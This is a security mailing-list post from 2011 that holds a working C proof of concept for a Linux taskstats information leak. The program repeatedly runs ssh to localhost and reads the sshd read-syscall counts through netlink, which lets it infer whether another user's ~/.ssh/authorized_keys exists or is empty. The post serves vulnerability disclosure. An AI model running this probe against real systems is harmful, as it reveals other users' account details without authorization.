Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Tue, 21 Jun 2011 22:18:08 +0400
From: Vasiliy Kulikov <segoon@...nwall.com>
To: oss-security@...ts.openwall.com
Subject: taskstats authorized_keys presence infoleak PoC

/*
 * This program tries to learn whether ~user/.ssh/authorized_keys exists
 * and is nonempty for any user on local machine.  It uses world-readable
 * taskstats' nature to get somewhat private io statistics information.  If
 * implant taskstats or /proc/<sshd-pid>/io polling into ssh client, it would be
 * possible to learn precise authorized_keys' size (and estimate private
 * key's(s') size).
 * 
 * The specific min_rsyscalls bounds are working on the testing machine with
 * Linux-3.0-rc2 x86_64 and OpenSSH_5.3p1 Debian-3ubuntu6 with
 * UsePrivilegeSeparation=no.  Other systems need their own numbers.
 *
 *	 gcc ssh_stat_authorized_keys.c -o ssh_stat_authorized_keys
 *
 * Based on linux-2.6/Documentation/accounting/getdelays.c
 * 
 * by Vasiliy Kulikov <segoon from openwall on com>, 2011/06/21
 */

#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <poll.h>
#include <string.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <signal.h>

#include <linux/genetlink.h>
#include <linux/taskstats.h>
#include <linux/cgroupstats.h>

/*
 * Generic macros for dealing with netlink sockets. Might be duplicated
 * elsewhere. It is recommended that commercial grade applications use
 * libnl or libnetlink and use the interfaces provided by the library
 */
#define GENLMSG_DATA(glh)	((void *)(NLMSG_DATA(glh) + GENL_HDRLEN))
#define GENLMSG_PAYLOAD(glh)	(NLMSG_PAYLOAD(glh, 0) - GENL_HDRLEN)
#define NLA_DATA(na)		((void *)((char*)(na) + NLA_HDRLEN))
#define NLA_PAYLOAD(len)	(len - NLA_HDRLEN)

#define err(code, fmt, arg...)			\
	do {					\
		fprintf(stderr, fmt, ##arg);	\
		exit(code);			\
	} while (0)

char name[100];


/* Maximum size of response requested or message sent */
#define MAX_MSG_SIZE	1024
/* Maximum number of cpus expected to be specified in a cpumask */
#define MAX_CPUS	32

struct msgtemplate {
	struct nlmsghdr n;
	struct genlmsghdr g;
	char buf[MAX_MSG_SIZE];
};

char cpumask[100+6*MAX_CPUS] = "0,1";

static void usage(void)
{
	fprintf(stderr, "getdelays [-dilv] [-w logfile] [-r bufsize] "
			"[-m cpumask] [-t tgid] [-p pid]\n");
	fprintf(stderr, "  -d: print delayacct stats\n");
	fprintf(stderr, "  -i: print IO accounting (works only with -p)\n");
	fprintf(stderr, "  -l: listen forever\n");
	fprintf(stderr, "  -v: debug on\n");
	fprintf(stderr, "  -C: container path\n");
}

/*
 * Create a raw netlink socket and bind
 */
static int create_nl_socket(int protocol)
{
	int fd;
	struct sockaddr_nl local;

	fd = socket(AF_NETLINK, SOCK_RAW, protocol);
	if (fd < 0)
		return -1;


	memset(&local, 0, sizeof(local));
	local.nl_family = AF_NETLINK;

	if (bind(fd, (struct sockaddr *) &local, sizeof(local)) < 0)
		goto error;

	return fd;
error:
	close(fd);
	return -1;
}


static int send_cmd(int sd, __u16 nlmsg_type, __u32 nlmsg_pid,
	     __u8 genl_cmd, __u16 nla_type,
	     void *nla_data, int nla_len)
{
	struct nlattr *na;
	struct sockaddr_nl nladdr;
	int r, buflen;
	char *buf;

	struct msgtemplate msg;

	msg.n.nlmsg_len = NLMSG_LENGTH(GENL_HDRLEN);
	msg.n.nlmsg_type = nlmsg_type;
	msg.n.nlmsg_flags = NLM_F_REQUEST;
	msg.n.nlmsg_seq = 0;
	msg.n.nlmsg_pid = nlmsg_pid;
	msg.g.cmd = genl_cmd;
	msg.g.version = 0x1;
	na = (struct nlattr *) GENLMSG_DATA(&msg);
	na->nla_type = nla_type;
	na->nla_len = nla_len + 1 + NLA_HDRLEN;
	memcpy(NLA_DATA(na), nla_data, nla_len);
	msg.n.nlmsg_len += NLMSG_ALIGN(na->nla_len);

	buf = (char *) &msg;
	buflen = msg.n.nlmsg_len ;
	memset(&nladdr, 0, sizeof(nladdr));
	nladdr.nl_family = AF_NETLINK;
	while ((r = sendto(sd, buf, buflen, 0, (struct sockaddr *) &nladdr,
			   sizeof(nladdr))) < buflen) {
		if (r > 0) {
			buf += r;
			buflen -= r;
		} else if (errno != EAGAIN)
			return -1;
	}
	return 0;
}


/*
 * Probe the controller in genetlink to find the family id
 * for the TASKSTATS family
 */
static int get_family_id(int sd)
{
	struct {
		struct nlmsghdr n;
		struct genlmsghdr g;
		char buf[256];
	} ans;

	int id = 0, rc;
	struct nlattr *na;
	int rep_len;

	strcpy(name, TASKSTATS_GENL_NAME);
	rc = send_cmd(sd, GENL_ID_CTRL, getpid(), CTRL_CMD_GETFAMILY,
			CTRL_ATTR_FAMILY_NAME, (void *)name,
			strlen(TASKSTATS_GENL_NAME)+1);
	if (rc < 0)
		return 0;	/* sendto() failure? */

	rep_len = recv(sd, &ans, sizeof(ans), 0);
	if (ans.n.nlmsg_type == NLMSG_ERROR ||
	    (rep_len < 0) || !NLMSG_OK((&ans.n), rep_len))
		return 0;

	na = (struct nlattr *) GENLMSG_DATA(&ans);
	na = (struct nlattr *) ((char *) na + NLA_ALIGN(na->nla_len));
	if (na->nla_type == CTRL_ATTR_FAMILY_ID) {
		id = *(__u16 *) NLA_DATA(na);
	}
	return id;
}

int main(int argc, char *argv[])
{
	int c, rc, rep_len, aggr_len, len2;
	__u16 id;
	__u32 mypid;

	struct nlattr *na;
	int nl_sd = -1;
	int len = 0;

    pid_t cpid;
    char username[128] = "root";
    unsigned long long min_rsyscalls = 100000, max_rsyscalls = 0;

	int count = 0;
	int maskset = 1;
    int max_count = 10;

	struct msgtemplate msg;
    struct taskstats *tst;

	while (1) {
		c = getopt(argc, argv, "u:");
		if (c < 0)
			break;

		switch (c) {
		case 'u':
			strcpy(username, optarg);
			break;
		default:
			usage();
			exit(-1);
		}
	}


	if ((nl_sd = create_nl_socket(NETLINK_GENERIC)) < 0)
		err(1, "error creating Netlink socket\n");


	mypid = getpid();
	id = get_family_id(nl_sd);
	if (!id) {
		fprintf(stderr, "Error getting family id, errno %d\n", errno);
		goto err;
	}

    rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
              TASKSTATS_CMD_ATTR_REGISTER_CPUMASK,
              &cpumask, strlen(cpumask) + 1);
    if (rc < 0) {
        fprintf(stderr, "error sending register cpumask\n");
        goto err;
    }

    if ((cpid = fork()) == 0) {
        char buffer[128];
        struct timeval tv;
        snprintf(buffer, sizeof(buffer),
             "ssh %s@...alhost -o PasswordAuthentication=no >/dev/null 2>/dev/null; echo -n .", username);

        printf("[*] username: %s\n[*] wait", username);
        fflush(stdout);
        
        while (1) {
            system(buffer);
            if (kill(mypid, 0))
                exit(0);
            
            tv.tv_sec = 0;
            tv.tv_usec = 100000;
            select(0, NULL, NULL, NULL, &tv);
        }
    }


	do {
		rep_len = recv(nl_sd, &msg, sizeof(msg), 0);

		if (rep_len < 0) {
			fprintf(stderr, "nonfatal reply error: errno %d\n",
				errno);
			continue;
		}
		if (msg.n.nlmsg_type == NLMSG_ERROR ||
		    !NLMSG_OK((&msg.n), rep_len)) {
			struct nlmsgerr *err = NLMSG_DATA(&msg);
			fprintf(stderr, "fatal reply error,  errno %d\n",
				err->error);
			goto done;
		}


		rep_len = GENLMSG_PAYLOAD(&msg.n);

		na = (struct nlattr *) GENLMSG_DATA(&msg);
		len = 0;
		while (len < rep_len) {
			len += NLA_ALIGN(na->nla_len);
			switch (na->nla_type) {
			case TASKSTATS_TYPE_AGGR_TGID:
				/* Fall through */
			case TASKSTATS_TYPE_AGGR_PID:
				aggr_len = NLA_PAYLOAD(na->nla_len);
				len2 = 0;
				/* For nested attributes, na follows */
				na = (struct nlattr *) NLA_DATA(na);
				while (len2 < aggr_len) {
					switch (na->nla_type) {
					case TASKSTATS_TYPE_STATS:
                        tst = (struct taskstats *) NLA_DATA(na);
                        if (strcmp(tst->ac_comm, "sshd"))
                            break;
						if (count++ >= max_count)
                            goto done;
                        
                        //printf("rsyscalls: %lu\n", (unsigned long)tst->read_syscalls);
                        if (max_rsyscalls < tst->read_syscalls)
                            max_rsyscalls = tst->read_syscalls;
                        if (min_rsyscalls > tst->read_syscalls)
                            min_rsyscalls = tst->read_syscalls;
						break;
					default:
						//fprintf(stderr, "Unknown nested" " nla_type %d\n", na->nla_type);
						break;
					}
					len2 += NLA_ALIGN(na->nla_len);
					na = (struct nlattr *) ((char *) na + len2);
				}
				break;

			default:
				//fprintf(stderr, "Unknown nla_type %d\n", na->nla_type);
			case TASKSTATS_TYPE_NULL:
				break;
			}
			na = (struct nlattr *) (GENLMSG_DATA(&msg) + len);
		}
	} while (1);
done:

    kill(cpid, SIGKILL);
    sleep(1);
    printf("\n[!] min/max read(): %llu/%llu\n[+] ", min_rsyscalls, max_rsyscalls);

    /*
     * These numbers are system-dependent!
     * Profile your system (e.g. on your own account) if you want it to work.
     */
    if (min_rsyscalls < 197)
        printf("~/%s/.ssh/authorized_keys doesn't exists.\n", username);
    else if (min_rsyscalls < 203)
        printf("~/%s/.ssh/authorized_keys is empty.\n", username);
    else if (min_rsyscalls < 210)
        printf("~/%s/.ssh/authorized_keys is not empty.\n", username);
    else
        printf("~/%s/.ssh/authorized_keys is full of keys!\n", username);

	if (maskset) {
		rc = send_cmd(nl_sd, id, mypid, TASKSTATS_CMD_GET,
			      TASKSTATS_CMD_ATTR_DEREGISTER_CPUMASK,
			      &cpumask, strlen(cpumask) + 1);
		//printf("Sent deregister mask, retval %d\n", rc);
		if (rc < 0)
			err(rc, "error sending deregister cpumask\n");
	}
err:
	close(nl_sd);
	return 0;
}

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.